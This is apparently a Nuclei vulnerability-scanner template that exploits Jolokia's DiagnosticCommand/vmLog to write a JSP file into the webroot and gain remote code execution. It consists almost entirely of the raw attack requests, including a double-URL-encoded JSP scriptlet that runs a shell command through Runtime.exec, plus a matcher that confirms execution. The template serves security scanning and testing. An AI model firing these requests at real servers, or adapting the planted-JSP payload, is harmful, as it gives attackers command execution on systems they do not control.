id: jolokia-vmlog-rce

info:
  name: Jolokia file write to RCE vmlog
  author: laluka,pathtaga
  severity: critical
  description: Use DiagnosticCommand/vmLog to define the vm logfile to a writeable path in the webroot, inject JSP payload in the logfile by triggering and error, disable logs to avoid bloating the jsp file created and trigger RCE.
  tags: jolokia,rce
  reference:
    - https://github.com/laluka/jolokia-exploitation-toolkit

requests:
  - raw:
      - |
        GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/path!/to!/jsp17290.jsp HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /jolokia/win%253C%2525%2520Runtime.getRuntime%2528%2529.exec%2528new%2520String%255B%255D%2520%257B%2520%2522sh%2522%252C%2520%2522-c%2522%252C%2520%2522id%253E!/tmp!/id.out%2522%2520%257D%2529%253B%2520%2525%253Ewin HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /jsp17290.jsp HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body_4
        regex:
          - "uid=.*"
